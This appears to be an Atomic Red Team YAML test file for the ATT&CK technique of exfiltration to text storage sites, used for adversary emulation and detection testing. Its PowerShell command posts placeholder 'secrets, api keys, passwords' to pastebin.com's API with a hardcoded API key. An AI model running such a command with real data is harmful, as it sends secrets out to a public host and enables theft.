Files
atomic-red-team/atomics/T1567.003/T1567.003.yaml
2023-09-13 01:27:43 +00:00

29 lines
1.2 KiB
YAML

attack_technique: T1567.003
display_name: 'Exfiltration Over Web Service: Exfiltration to Text Storage Sites'
atomic_tests:
- name: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3
description: |
This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
supported_platforms:
- windows
input_arguments:
api_key:
description: Pastebin API key
type: string
default: 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0
executor:
command: |
$apiKey = "#{api_key}"
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
$postData = @{
api_dev_key = $apiKey
api_option = "paste"
api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"
name: powershell
elevation_required: false